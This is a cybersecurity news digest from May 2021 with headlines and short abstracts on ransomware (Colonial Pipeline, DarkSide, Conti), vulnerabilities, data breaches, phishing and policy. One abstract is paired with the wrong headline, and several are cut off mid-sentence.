Google Chrome Makes It Easier to Update Compromised Passwords Full Text

Abstract Google is launching a new capability in Chrome to alert users when a password is compromised and automate the process of updating to a new one. The feature runs on Google's Duplex technology.

Dark Reading

May 20, 2021 – Vulnerabilities

Information disclosure vulnerability spotted in macOS SMB server Full Text

Abstract The integer overflow vulnerability exists in the way macOS SMB server processes SMB3 compounded packets. An attacker could exploit this vulnerability by sending a specially crafted packet.

Cisco Talos

May 20, 2021 – Ransomware

Conti ransomware gives HSE Ireland free decryptor, still selling data Full Text

Abstract The Conti ransomware gang has released a free decryptor for Ireland's health service, the HSE, but warns that they will still sell or release the stolen data.

BleepingComputer

May 20, 2021 – Ransomware

Money-go-round: The booming cottage industry behind ransomware Full Text

Abstract As policymakers try to respond to incidents, they're finding out that the problem is larger than cybercriminals extorting corporations and governments to regain access to their own data.

Politico

May 20, 2021 – Breach

23 Android Apps Expose Over 100,000,000 Users’ Personal Data Full Text

Abstract Misconfigurations in multiple Android apps leaked sensitive data of more than 100 million users, potentially making them a lucrative target for malicious actors. "By not following best-practices when configuring and integrating third-party cloud-services into applications, millions of users' private data was exposed," Check Point researchers said in an analysis published today and shared with The Hacker News. "In some cases, this type of misuse only affects the users, however, the developers were also left vulnerable. The misconfigurations put users' personal data and developer's internal resources, such as access to update mechanisms, storage, and more at risk." The findings come from a study of 23 Android applications available in the official Google Play Store, some of which have downloads ranging from 10,000 to 10 million, such as Astro Guru, iFax, Logo Maker, Screen Recorder, and T'Leva. According to Check Point, the issues stem from m

The Hacker News

May 20, 2021 – General

HMRC Investing Heavily in Cybersecurity Training for Staff, Official Figures Show Full Text

Abstract The Art of Hacking was the most popular course for HMRC security staff

Infosecurity Magazine

May 20, 2021 – Ransomware

It’s Time to Surge Resources Into Prosecuting Ransomware Gangs Full Text

Abstract The Justice Department needs a “troop surge” of cyber prosecutors and agents to conduct long-term, proactive investigations into ransomware gangs and the organizations that enable them.

Lawfare

May 20, 2021 – Breach

A dozen Android apps exposed data of 100M+ users Full Text

Abstract Check Point researchers found 23 Android apps that exposed the personal data of more than 100 million users. Security researchers from Check Point have discovered 23 Android applications that exposed the personal data of more than 100 million users...

Security Affairs

May 20, 2021 – Breach

Data of 100+ million Android users exposed via misconfigured cloud services Full Text

Abstract A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.

BleepingComputer

May 20, 2021 – Breach

UK recruitment firm exposed sensitive applicants data for months Full Text

Abstract This data breach majorly affected the applicants whose CVs containing personal information were leaked due to misconfigured AWS S3 buckets, reports the research team at Website Planet.

Hackread

May 20, 2021 – General

Is Single Sign-On Enough to Secure Your SaaS Applications? Full Text

Abstract If there's one thing all great SaaS platforms share in common, it's their focus on simplifying the lives of their end-users. Removing friction for users in a safe way is the mission of single sign-on (SSO) providers. With SSO at the helm, users don't have to remember separate passwords for each app or hide the digital copies of the credentials in plain sight. SSO also frees up the IT's bandwidth from handling recurring password reset requests while improving productivity for everyone in your organization. However, there is also a level of risk that comes with SSO capability. While SSO facilitates ease of access to a great extent, it also comes with some amount of imminent risk. SSO is a good enabler of efficiency, but not the end-all security solution with its own flaws that allow for bypass. There's a specific class of vulnerability that Adam Roberts from the NCC Group detected in several SSO

The Hacker News

May 20, 2021 – General

Web App Bugs Drove Multiple Breaches Per Firm in 2020 Full Text

Abstract Barracuda Networks claims bad bots are the main challenge

Infosecurity Magazine

May 20, 2021 – Policy and Law

Privacy Concerns On Cookies Storing Personal Information Full Text

Abstract What are the privacy concerns about the way organizations collect personal information through the use of cookies? Data is constantly being tracked, stored and processed right under our noses, and it is quite frightening to know just how much data a company...

Security Affairs

May 20, 2021 – Ransomware

This is how long hackers will hide in your network before deploying ransomware or being spotted Full Text

Abstract Cyberattackers on average have 11 days after breaching a target network before they're being detected, according to Sophos – and often when they are spotted it's because they've deployed ransomware.

ZDNet

May 20, 2021 – Attack

Watering Hole Attack Was Used to Target Florida Water Utilities Full Text

Abstract An investigation undertaken in the aftermath of the Oldsmar water plant hack earlier this year has revealed that an infrastructure contractor in the U.S. state of Florida hosted malicious code on its website in what's known as a watering hole attack. "This malicious code seemingly targeted water utilities, particularly in Florida, and more importantly, was visited by a browser from the city of Oldsmar on the same day of the poisoning event," Dragos researcher Kent Backman said in a write-up published on Tuesday. The site, which belongs to a Florida-based general contractor involved in building water and wastewater treatment facilities, had no bearing on the intrusion, the American industrial cybersecurity firm said. Watering hole attacks typically allow an adversary to compromise a specific group of end-users by compromising a carefully selected website, which members of that group are known to visit, with an intention to gain access to the victim's system an

The Hacker News

May 20, 2021 – Malware

Fake Microsoft Authenticator extension discovered in Chrome Store Full Text

Abstract According to the report, the fake Microsoft Authenticator extension was made available on April 23 this year after failing to be spotted by Google’s security systems and has reached 448 users.

Bitdefender

May 20, 2021 – Phishing

Domain Group Discloses Phishing Attack that Targeted Site Users Full Text

Abstract "We have identified a scam that used a phishing attack to gain access to Domain's administrative systems to engage with people who have made rental property enquiries," the company's CEO told ZDNet.

ZDNet

May 20, 2021 – Malware

BazarCall: Call Centers Help Spread BazarLoader Malware Full Text

Abstract In February, researchers began reporting a call center-based method of distributing BazarLoader. It utilizes trial subscription-themed emails that encourage potential victims to call a phone number.

Palo Alto Networks

May 20, 2021 – Hacker

Exchange Server Attackers Launched Scans Within Five Minutes of Disclosure Full Text

Abstract Cheap cloud services support threat actor efforts

Infosecurity Magazine

May 20, 2021 – Vulnerabilities

Pega Infinity patches authentication vulnerability - Malwarebytes Labs Full Text

Abstract There are several PoCs readily available, including complete videos on YouTube, so users of the Pega Infinity enterprise software platform are being advised to update their installations.

Malwarebytes Labs

May 20, 2021 – Government

European Union Extends Framework for Cyberattack Sanctions Full Text

Abstract This week, the European Council announced its decision to extend for one year the framework for sanctions against cyberattacks that threaten the European Union and its member states.

Security Week

May 20, 2021 – Ransomware

Colonial CEO Reportedly Confirms $4.4 Million Ransom Payment Full Text

Abstract Firm speaks out about attack

Infosecurity Magazine

May 20, 2021 – Policy and Law

Russian citizen Anton Bogdanov sentenced to 5 years for cyber tax fraud scheme Full Text

Abstract Russian hacker Anton Bogdanov was sentenced to 5 years' imprisonment for attempting to steal $1.5 million in tax refunds by hacking into tax preparation firms. The Russian citizen Anton Bogdanov (35), aka Kusok, was sentenced by a US Chief District...

Security Affairs

May 20, 2021 – Phishing

Royal Mail phish deploys evasion tricks to avoid analysis Full Text

Abstract When you click the link to visit the fake Royal Mail page, there’s a fair bit of code for detecting potential VM use. It tests for WebGL renders and whether site visitors have a display or not.

Malwarebytes Labs

May 20, 2021 – Vulnerabilities

Blind SQL Injection flaw in WP Statistics impacted 600K+ sites Full Text

Abstract Experts discovered a Time-Based Blind SQL Injection vulnerability in the WP Statistics plugin which is installed on over 600,000 WordPress sites. Researchers from the Wordfence Threat Intelligence discovered a Time-Based Blind SQL Injection vulnerability...

Security Affairs

May 20, 2021 – Cryptocurrency

#RSAC: The Security Risks of Cryptocurrency Full Text

Abstract While it's not likely that cryptocurrency will replace the US dollar as a reserve currency in the short term, RSA Conference session details cryptocurrency security risks and mitigations

Infosecurity Magazine

May 20, 2021 – Privacy

#RSAC: The Lasting Impact of the COVID Pandemic on Privacy Full Text

Abstract A year of lockdown, remote work and remote learning could well be the spark that helps to define a new era of user privacy, according to a panel of experts at the RSA Conference

Infosecurity Magazine

May 19, 2021 – Government

US denies disrupting Russian cyber group behind Colonial pipeline hack Full Text

Abstract The United States did not take action against the cyber criminal group that was behind the ransomware attack on Colonial Pipeline earlier this month, officials told The Washington Post.

The Hill

May 19, 2021 – Government

House Science panel requests briefing with Energy Dept. over Colonial hack Full Text

Abstract Leaders of the House Science, Space and Technology Committee are requesting a briefing with the Department of Energy on the ransomware attack that forced the Colonial Pipeline to shut down operations for nearly a week.

The Hill

May 19, 2021 – Business

As digital innovation accelerates, what is the next cyber investment unicorn? Full Text

Abstract Companies poised to do well in the rapidly accelerated digital economy are those that can cater to concepts such as dynamic network infrastructure and securing edge computing. In particular, said Chenxi Wang of Rain Capital, the market is witnessing “great momentum in cloud security.”

SCMagazine

May 19, 2021 – General

Hillicon Valley: Colonial Pipeline CEO says company paid hackers $4.4 million in ransomware attack | Facebook sets up ‘special operations center’ for content on Israeli-Palestinian conflict | Granholm expresses openness to pipeline cyber standards after Full Text

Abstract The CEO of Colonial Pipeline on Wednesday gave his first interview since the company was hit by a ransomware attack earlier this month, confirming publicly that he approved the payment of $4.4 million to the hackers to regain access to IT systems. Meanwhile, Facebook has set up a special operations center to monitor content on its platforms involving the Israeli-Palestinian conflict, and Energy Secretary Jennifer Granholm expressed some tentative support for mandatory security standards for pipelines.

The Hill

May 19, 2021 – Government

DHS announces program to mitigate vulnerabilities below the operating system Full Text

Abstract A notable rise in firmware vulnerabilities comes at a time when more run-of-the-mill criminals have access. CISA proposed a multi-step approach to tackle the growing threat.

SCMagazine

May 19, 2021 – General

Ready to move to the cloud? Here’s what you need to do when vetting service providers Full Text

Abstract During the RSA Conference’s Cloud Security Summit this week, three speakers noted top priorities when making a cloud transition, all tied to establishing expectations of a cloud service provider up front, and ensuring in writing that the provider can and will adhere to specific standards for maintaining and securing data.

SCMagazine

May 19, 2021 – Botnet

Keksec Cybergang Debuts Simps Botnet for Gaming DDoS Full Text

Abstract The newly discovered malware infects IoT devices in tandem with the prolific Gafgyt botnet, using known security vulnerabilities.

Threatpost

May 19, 2021 – IOT

Can Nanotech Secure IoT Devices From the Inside-Out? Full Text

Abstract Work’s being done with uber-lightweight nanoagents on every IoT device to stop malicious behavior, such as a scourge of botnet attacks, among other threats.

Threatpost

May 19, 2021 – Phishing

Microsoft, Google Clouds Hijacked for Gobs of Phishing Full Text

Abstract Attackers sent 52M malicious messages leveraging the likes of Office 365, Azure, OneDrive, SharePoint, G-Suite and Firebase storage in Q1 2021.

Threatpost

May 19, 2021 – Malware

Bizarro Trojan: Fiercely Stealing Banking Information Full Text

Abstract A new banking trojan, that can harvest bank account logins from Android mobile users, is now spreading quickly in multiple regions. Banking customers are recommended to stay vigilant.

Cyware Alerts - Hacker News

May 19, 2021 – Vulnerabilities

Google addresses 4 zero-day flaws in Android exploited in the wild Full Text

Abstract Google released Android Security Bulletin for May 2021 security updates that address four zero-day vulnerabilities that were exploited in the wild. Android Security Bulletin for May 2021 security updates address four zero-day vulnerabilities, tracked...

Security Affairs

May 19, 2021 – Covid-19

Impact of COVID-19 on Data Breach Landscape Full Text

Abstract The DBIR report from Verizon provides insights on the growing danger of phishing and ransomware attacks while digging into unique insights on the impact of the COVID-19 pandemic on the data breach landscape.

Cyware Alerts - Hacker News

May 19, 2021 – Attack

#RSAC: SolarWinds CEO Provides New Details into Attack and Response Full Text

Abstract Sudhakar Ramakrishna gives details of investigations into the supply chain attack

Infosecurity Magazine

May 19, 2021 – Business

ReaQta Closes Series-A Round to Expand Commercial Operations Full Text

Abstract ReaQta will invest the Series A funding, led by Alpha Intelligence Capital, towards expanding its commercial operations and footprint, particularly across Europe and Asia.

Yahoo! Finance

May 19, 2021 – Vulnerabilities

Threats Hover Over Tor Users Full Text

Abstract Two fresh waves of attacks including SSL-stripping attacks and scheme flooding have been observed crippling Tor users. Users are recommended to keep the web browser updated to fix any exploitable vulnerability.

Cyware Alerts - Hacker News

May 19, 2021 – Ransomware

Qlocker ransomware shuts down after extorting hundreds of QNAP users Full Text

Abstract The Qlocker ransomware gang has shut down their operation after earning $350,000 in a month by exploiting vulnerabilities in QNAP NAS devices.

BleepingComputer

May 19, 2021 – Outage

Packaging vendor Ardagh admits cyber-attack disrupted operations Full Text

Abstract In a statement issued on May 17, the manufacturer said that the assault prompted it to institute “containment procedures, including pro-actively shutting down certain IT systems and applications”.

The Daily Swig

May 19, 2021 – Government

Granholm expresses openness to pipeline cyber standards after Colonial attack Full Text

Abstract Energy Secretary Jennifer Granholm on Wednesday threw her tentative support behind the idea of mandatory standards to secure pipelines in the wake of the debilitating ransomware attack on Colonial Pipeline earlier this month.

The Hill

May 19, 2021 – Breach

UHS Data Breach Lawsuit Proceeds Full Text

Abstract Data breach lawsuit against healthcare provider gets the go-ahead but only for one patient

Infosecurity Magazine

May 19, 2021 – Attack

Trailer maker Utility targeted in ransomware attack Full Text

Abstract Utility Trailer Manufacturing, one of the largest U.S. producers of trailers for the trucking industry, was targeted in a ransomware attack that exposed personal information of numerous employees.

Freight Waves

May 19, 2021 – Business

Splunk to Acquire TruSTAR Full Text

Abstract California tech company Splunk announces plan to snap up cloud-native security firm

Infosecurity Magazine

May 19, 2021 – Ransomware

How the ransomware explosion is reshaping the cyber insurance market Full Text

Abstract After the NotPetya attacks, insurance companies started applying far more scrutiny to efforts by customers to protect themselves from ransomware. In the wake of Colonial Pipeline and other recent incidents, more shifts in coverage could emerge – and priorities of the insurers might not match up with those of victims.

SCMagazine

May 19, 2021 – Business

Cynerio Raises $30M in Series B Funding Full Text

Abstract It was led by Alive Israel HealthTech Fund, with participation from existing investors Accelmed, RDC, MTIP, CBG London investment company owned by Vincent Tchenguiz, and UAE based investment group.

FinSMEs

May 19, 2021 – Vulnerabilities

May Android security updates patch 4 zero-days exploited in the wild Full Text

Abstract According to info provided by Google's Project Zero team, four Android security vulnerabilities were exploited in the wild as zero-day bugs before being patched earlier this month.

BleepingComputer

May 19, 2021 – Criminals

DarkSide Gang Retires on $90m Full Text

Abstract Wallet containing Bitcoin worth over $90m is reportedly ransomware gang’s ill-gotten gains

Infosecurity Magazine

May 19, 2021 – General

#DTX: Security Pros Must Focus on Human Behaviors to Address Cyber-challenges Full Text

Abstract There's more the industry can do to prevent social engineering attacks and scams

Infosecurity Magazine

May 19, 2021 – Business

Colonial Pipeline CEO says company paid hackers $4.4 million in ransomware attack Full Text

Abstract The CEO of Colonial Pipeline, hit by a ransomware attack that forced it to shut down operations for much of last week, confirmed publicly for the first time Wednesday that the company paid the hackers behind the attack so it could regain access to its systems.

The Hill

May 19, 2021 – Vulnerabilities

Researchers Find Exploitable Remote Code Execution Vulnerabilities in Mercedes-Benz Cars Full Text

Abstract Following an eight-month audit of the code in the latest infotainment system in Mercedes-Benz cars, security researchers with Tencent Security Keen Lab identified five vulnerabilities.

Security Week

May 19, 2021 – Malware

TeamTNT’s Extended Credential Harvester Targets Cloud Services, Other Software Full Text

Abstract The cybercriminal group TeamTNT is no stranger to targeting cloud containers, expanding their arsenal to steal cloud credentials, and exploring other environments and intrusive activities.

Trend Micro

May 19, 2021 – Policy and Law

US introduces bills to secure critical infrastructure from cyber attacks Full Text

Abstract The US House Committee on Homeland Security has passed five bipartisan bills on Monday to bolster defense capabilities against cyber attacks targeting US organizations and critical infrastructure.

BleepingComputer

May 19, 2021 – General

Google Cloud CISO: Usability must be baked into design of security tools Full Text

Abstract Security and usability are not mutually exclusive, and effectively combining these concepts can help organizations overcome the cyber skills gap, according to Google Cloud Chief Information Security Officer Phil Venables, during an RSA Conference keynote session.

SCMagazine

May 19, 2021 – Hacker

Hackers scan for vulnerable devices minutes after bug disclosure Full Text

Abstract Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.

BleepingComputer

May 19, 2021 – Vulnerabilities

Emerson Patches Several Vulnerabilities in X-STREAM Gas Analyzers Full Text

Abstract American industrial giant Emerson this week informed customers that it has released firmware updates for its Rosemount X-STREAM gas analyzers to address half a dozen vulnerabilities.

Security Week

May 19, 2021 – Ransomware

School districts struggle to defend against rising ransomware attacks Full Text

Abstract Cyber criminals are stepping up their efforts to hack into vulnerable school districts, often launching ransomware attacks like the kind that shut down the Colonial Pipeline earlier this month.

The Hill

May 19, 2021 – Ransomware

DarkSide Ransomware Gang Extorted $90 Million from Several Victims in 9 Months Full Text

Abstract DarkSide, the hacker group behind the Colonial Pipeline ransomware attack earlier this month, received $90 million in bitcoin payments following a nine-month ransomware spree, making it one of the most profitable cybercrime groups. "In total, just over $90 million in bitcoin ransom payments were made to DarkSide, originating from 47 distinct wallets," blockchain analytics firm Elliptic said. "According to DarkTracer, 99 organisations have been infected with the DarkSide malware - suggesting that approximately 47% of victims paid a ransom, and that the average payment was $1.9 million." Of the total $90 million haul, the DarkSide's developer is said to have received $15.5 million in bitcoins, while the remaining $74.7 million was split among its various affiliates. FireEye's research into DarkSide's affiliate program had previously revealed that its creators take a 25% cut for payments under $500,000 and 10% for ransoms above $5 million, with t

The Hacker News

May 19, 2021 – Policy and Law

Regulator Fines QR Code Provider Which Spammed Customers Full Text

Abstract St Albans company sent 84,000 nuisance emails

Infosecurity Magazine

May 19, 2021 – Vulnerabilities

Hacking the infotainment system used in Mercedes-Benz cars Full Text

Abstract Security researchers identified five vulnerabilities in the infotainment system in Mercedes-Benz cars, four of them are remotely exploitable. Security researchers with Tencent Security Keen Lab identified five vulnerabilities, tracked as CVE-2021-23906,...

Security Affairs

May 19, 2021 – Vulnerabilities

Windows PoC Exploit Released for Wormable RCE Full Text

Abstract The exploit pries open CVE-2021-31166, a bug with a CVSS score of 9.8 that was the baddest of the bad in Microsoft’s Patch Tuesday release last week.

Threatpost

May 19, 2021 – Vulnerabilities

Latest phones are great at thwarting Wi-Fi tracking. Other devices, not so much – study Full Text

Abstract While the paper indicates that mobile phones have become better at implementing MAC address randomization, it also highlights the lack of a standard approach has led to inconsistent implementations.

The Register

May 19, 2021 – Solution

Mozilla Begins Rolling Out ‘Site Isolation’ Security Feature to Firefox Browser Full Text

Abstract Mozilla has begun rolling out a new security feature for its Firefox browser in nightly and beta channels that aims to protect users against a new class of side-channel attacks from malicious sites. Called "Site Isolation," the implementation loads each website separately in its own operating system process and, as a result, prevents untrusted code from a rogue website from accessing confidential information stored in other sites. "This fundamental redesign of Firefox's Security architecture extends current security mechanisms by creating operating system process-level boundaries for all sites loaded in Firefox for Desktop," Mozilla said in a statement. "Isolating each site into a separate operating system process makes it even harder for malicious sites to read another site's secret or private data." The motivation for Site Isolation can be traced all the way back to January 2018 when Spectre and Meltdown vulnerabilities were publicly dis

The Hacker News

May 19, 2021 – General

RDP Hijacked for Lateral Movement in 69% of Attacks Full Text

Abstract Sophos report warns that dwell time is up to 11 days

Infosecurity Magazine

May 19, 2021 – Ransomware

Conti ransomware gang also breached Ireland Department of Health (DoH) Full Text

Abstract Conti ransomware also breached the network of Ireland's Department of Health (DoH), but the ransomware failed to encrypt the systems. Last week, the Conti ransomware gang targeted Ireland's Health Service Executive, which was forced to shut down its IT systems...

Security Affairs

May 19, 2021 – Malware

New WastedLoader Campaign Delivered Through RIG Exploit Kit Full Text

Abstract In February 2021, Bitdefender researchers identified a new RIG Exploit Kit campaign exploiting two scripting engine vulnerabilities in unpatched Internet Explorer browsers.

Bitdefender

May 19, 2021 – Solution

A Simple 1-Click Compromised Password Reset Feature Coming to Chrome Browser Full Text

Abstract Google on Tuesday announced a new feature to its password manager that could be used to change a stolen password automatically with a single tap. Automated password changes build on the tool's ability to check the safety of saved passwords. Thus when Chrome finds a password that may have been compromised as part of a data breach, it will prompt users with an alert containing a "Change Password" button, tapping which "Chrome will not only navigate to the site, but also go through the entire process of changing your password." Enabling this in the background is Google's Duplex technology, which it debuted in 2018 and expanded in 2019 to support various functions in Google Assistant like booking a rental car, ordering food, and buying movie tickets. The search giant, however, noted that users could take over control at any point during the process and change the password manually. The feature is currently being rolled out in Chrome for Android to al

The Hacker News

May 19, 2021 – Breach

Recruiter’s Cloud Snafu Exposes 20,000 CVs and ID Documents Full Text

Abstract Misconfigured AWS bucket again to blame

Infosecurity Magazine

May 19, 2021 – Business

Styra, the startup behind Open Policy Agent, nabs $40M to expand its cloud-native authorization tools Full Text

Abstract Styra's Series B round of funding led by Battery Ventures. Also participating are previous backers A. Capital, Unusual Ventures and Accel; and new backers CapitalOne Ventures and Citi Ventures.

TechCrunch

May 19, 2021 – Ransomware

Ransomware Attackers Target New Zealand District Hospitals, Causing Outages and Surgery Cancellations Full Text

Abstract New Zealand's Waikato District Health Board (DHB) has been hit with a ransomware that took down most IT services Tuesday morning and drastically reduced services at six of its affiliate hospitals.

The Register

May 19, 2021 – Business

ThreatLocker raises $20M to secure enterprise endpoints Full Text

Abstract ThreatLocker, a startup providing enterprise cybersecurity tools for servers and endpoints, today announced it has raised $20 million in a series B round led by Elephant.

Venture Beat

May 19, 2021 – Hacker

Colonial Pipeline Hackers Received $90 million in Bitcoin from Multiple Victims Before Shutting Down Full Text

Abstract DarkSide, the group behind the recent Colonial Pipeline ransomware attack, received a total of $90 million in bitcoin ransom payments before shutting down last week, according to fresh research.

NBC News

May 19, 2021 – Phishing

Scammers Impersonating Windows Defender to Push Malicious Windows Apps | McAfee Blogs Full Text

Abstract Cybercriminals are increasingly using Windows Push Notifications to impersonate legitimate alerts. Recent campaigns pose as a Windows Defender Update to target user and system information.

McAfee

May 19, 2021 – Phishing

Payment App Scammers: Stay Aware and Learn to Avoid Them Full Text

Abstract While it is convenient and becoming more popular to use virtual wallets like Venmo, PayPal, and Cash App, there is a risk of potentially being scammed by someone who isn't who they say they are.

Binary Defense

May 19, 2021 – Ransomware

MountLocker ransomware uses Windows API to worm through networks Full Text

Abstract The MountLocker ransomware operation now uses enterprise Windows Active Directory APIs to worm through networks.

BleepingComputer

May 19, 2021 – Ransomware

DarkSide ransomware made $90 million since October 2020 Full Text

Abstract Researchers from blockchain analysis firm Elliptic estimated that Darkside ransomware gang has made over $90 million from its attacks. Experts from blockchain analysis firm Elliptic estimated that the Darkside ransomware gang has earned over $90 million...

Security Affairs

May 18, 2021 – General

Hillicon Valley: Democrats urge Facebook to abandon ‘Instagram for kids’ plan | ‘Homework gap’ likely to persist after pandemic Full Text

Abstract A group of congressional Democrats on Tuesday called on Facebook to abandon a plan to create an Instagram for kids platform, further amplifying criticism of the plan. Meanwhile, advocates are expressing concerns that the “homework gap” created by digital learning during the COVID-19 pandemic may continue once students return to in-person classes, and Colonial Pipeline said it was experiencing some technical issues a week after service resumed after a devastating ransomware attack. 

The Hill

May 18, 2021 – General

#RSAC: Solving the Ransomware Scourge Requires a Coordinated Effort Full Text

Abstract What is the current state of ransomware and what needs to be done to stop it? A panel of experts at the RSA Conference has a few ideas

Infosecurity Magazine

May 18, 2021 – Policy and Law

Legislation to secure critical systems against cyberattacks moves forward in the House Full Text

Abstract Multiple bills meant to secure critical infrastructure against cyber threats were approved by the House Homeland Security Committee on Tuesday afternoon, just a week after a ransomware attack on the Colonial Pipeline caused fuel shortages across the nation. 

The Hill

May 18, 2021 – Breach

‘How would I feel if that was posted in Times Square?’ Lawyers warn to watch what you say about breaches Full Text

Abstract Law firm partner advises RSA Conference attendees to practice “communication hygiene” when emailing or messaging.

SCMagazine

May 18, 2021 – Phishing

Scammers Pose as Meal-Kit Services to Steal Customer Data Full Text

Abstract Attackers are sending messages disguised as offers from meal-kit services, like HelloFresh.

Threatpost

May 18, 2021 – Government

Lawmakers press Biden to create plan to secure economy after Colonial Pipeline attack Full Text

Abstract The bipartisan leaders of the House Homeland Security Committee on Tuesday urged President Biden to ensure there is a plan in place to ensure the nation’s economy is not disrupted by a major cyberattack.

The Hill

May 18, 2021 – Solution

Chrome now automatically fixes breached passwords on Android Full Text

Abstract Google is rolling out a new Chrome on Android feature to help users change passwords leaked online following data breaches with a single tap.

BleepingComputer

May 18, 2021 – General

#RSAC: Does the US Need a National Breach Reporting Law? Full Text

Abstract Panelists at the RSA Conference 2021, including the FBI and US Department of Justice, make a case for a national standard for data breach reporting

Infosecurity Magazine

May 18, 2021 – Solution

Mozilla starts rolling out Site Isolation to all Firefox channels Full Text

Abstract Mozilla has started rolling out the Site Isolation security feature to all Firefox channels, now also protecting users in the Beta and Release channels from attacks launched via malicious websites.

BleepingComputer

May 18, 2021 – Government

#RSAC: Anne Neuberger Sets Out Biden Administration’s Plan to Modernize US Cyber-defenses Full Text

Abstract Anne Neuberger outlines three areas of focus for the Biden administration to enhance the US's cybersecurity

Infosecurity Magazine

May 18, 2021 – Malware

Stalkerware Apps Riddled with Security Bugs Full Text

Abstract Attackers can take advantage of the fact these apps access, gather, store and transmit more information than any other app their victims have installed.

Threatpost

May 18, 2021 – Ransomware

Analysis of NoCry ransomware: A variant of the Judge ransomware Full Text

Abstract The NoCry ransomware, which is very similar to Judge, creates a mutex to prevent multiple instances from running in parallel, provides sandbox detection, and deletes system restore points.

Security Affairs

May 18, 2021 – Government

Japan to restrict private sector use of foreign equipment and tech: Report Full Text

Abstract The Japanese government will reportedly introduce new regulations across 44 sectors to bolster national cyber defence, partly in response to the Colonial Pipeline hack that occurred last week.

ZDNet

May 18, 2021 – Policy and Law

European Council extends sanctions against foreign threat actors Full Text

Abstract The European Council extended for one year the sanctions against foreign threat actors that threaten the European Union and its member states. The European Council announced that it will extend for one year the framework for sanctions against threat actors...

Security Affairs

May 18, 2021 – Hacker

Try This One Weird Trick Russian Hackers Hate – Krebs on Security Full Text

Abstract Digital extortion gangs like DarkSide take great care to make their entire platforms geopolitical, because their malware is engineered to work only in certain parts of the world.

Krebs on Security

May 18, 2021 – Government

Biden Administration Plans to Spend Billions in Cybersecurity Funding to Protect Critical Infrastructure Full Text

Abstract The Biden administration on Tuesday detailed how it wants to fund efforts to counter a wave of massive hacks in the wake of this month’s Colonial Pipeline ransomware attack.

Reuters

May 18, 2021 – Attack

Colonial Pipeline servers experiencing ‘intermittent disruptions’ days after ransomware attack Full Text

Abstract Colonial Pipeline announced Tuesday that its internal servers were experiencing “intermittent disruptions," but stressed the problem was separate from the devastating ransomware attack that disrupted operations earlier this month.

The Hill

May 18, 2021 – Business

Eldorado-based Shared Assessments acquired by national company OneTrust Full Text

Abstract Eldorado-based cybersecurity firm Shared Assessments has been acquired for an undisclosed price by one of its member organizations, OneTrust, at one time the fastest-growing company on the Inc. 5000.

Yahoo! Finance

May 18, 2021 – General

Attention CEOs: No news can be good news when investigating a breach Full Text

Abstract David Estlick, CISO of Chipotle Mexican Grill, joined James Christiansen, vice president and CSO of cloud security transformation at Netskope, to speak about managing corporate expectations post breach.

SCMagazine

May 18, 2021 – Phishing

FBI receives record level of complaints for online scams, investment fraud Full Text

Abstract The FBI says that complaints concerning online scams and investment fraud have now reached a record-breaking level. The FBI's IC3 received its six millionth complaint on May 15, 2021.

ZDNet

May 18, 2021 – General

#RSAC: McAfee CTO Calls for Risk Decisions Based on Science Not Headlines Full Text

Abstract McAfee senior vice president and CTO, Steve Grobman, took to the virtual stage at RSA Conference on May 18 with a call to action: reconsider the perception of risk by looking at data, not headlines

Infosecurity Magazine

May 18, 2021 – Ransomware

DarkSide ransomware made $90 million in just nine months Full Text

Abstract The DarkSide ransomware gang has collected at least $90 million in ransoms paid by its victims over the past nine months to multiple Bitcoin wallets.

BleepingComputer

May 18, 2021 – Botnet

Discovery of Simps Botnet Reveals Ties to Keksec Hacker Group Full Text

Abstract Simps botnet binary uses Mirai and Gafgyt modules for DDOS functionality. The botnet might be in the early stages of development because of the presence of the infected.log file after execution.

Security Affairs

May 18, 2021 – General

FBI says cybercrime complaints more than doubled in 14 months Full Text

Abstract The FBI's Internet Crime Complaint Center (IC3) has seen a massive 100% increase in cybercrime complaints over the past 14 months.

BleepingComputer

May 18, 2021 – Vulnerabilities

Commercial third party code creating security blind spots Full Text

Abstract Despite the fact that third party code in IoT projects has grown 17% in the past five years, only 56% of OEMs have formal policies for testing security, VDC Research reveals.

Help Net Security

May 18, 2021 – General

It’s Time to Prepare for a Rise in Insider Threats Full Text

Abstract Anurag Kahol, CTO at Bitglass, discusses options for detecting malicious or dangerous activity from within an organization.

Threatpost

May 18, 2021 – General

Over $80 million lost to cryptocurrency investment scams since October Full Text

Abstract The US Federal Trade Commission (FTC) says that over $80 million were lost to cryptocurrency investment scams, according to roughly 7,000 reports received since October 2020.

BleepingComputer

May 18, 2021 – Hacker

Researchers Discover Attackers Obfuscating IP Addresses Inside AWS Using Amazon VPC Service Full Text

Abstract Security researchers have documented an attack technique that may allow attackers to leverage a legitimate Amazon VPC feature to mask their use of stolen API credentials inside AWS.

Help Net Security

May 18, 2021 – Denial Of Service

Q1 2021 Sees 2.9 Million DDoS Attacks Launched Full Text

Abstract DDoS attacks in Q1 2021 up 31% YoY, according to new research

Infosecurity Magazine

May 18, 2021 – Attack

‘Flattered’ Russian spy chief denies SolarWinds attack Full Text

Abstract The United States and Britain have blamed Russia's Foreign Intelligence Service (SVR) for the hack which compromised nine U.S. federal agencies and hundreds of private sector companies.

Reuters

May 18, 2021 – Policy and Law

Oregonian Indicted Over International Streaming Fraud Full Text

Abstract AccountBot suspect allegedly stole and resold millions of customers’ login credentials

Infosecurity Magazine

May 18, 2021 – Ransomware

Double-extortion ransomware attacks on the rise Full Text

Abstract As the rewards that result from this type of crime increase, risks to government entities, company bottom lines, reputation, data integrity, customer confidence, and business continuity also grow.

Help Net Security

May 18, 2021 – Ransomware

Unsuccessful Conti Ransomware Attack Still Packs Costly Punch Full Text

Abstract Separate attacks last week on the country’s Department of Health and Health Service Executive forced the shutdown of networks and services that still haven’t been fully restored.

Threatpost

May 18, 2021 – Business

IBM to Acquire Waeg Full Text

Abstract Deal to acquire European Salesforce Consulting Partner expected to close this quarter

Infosecurity Magazine

May 18, 2021 – Privacy

How Apple Gave Chinese Government Access to iCloud Data and Censored Apps Full Text

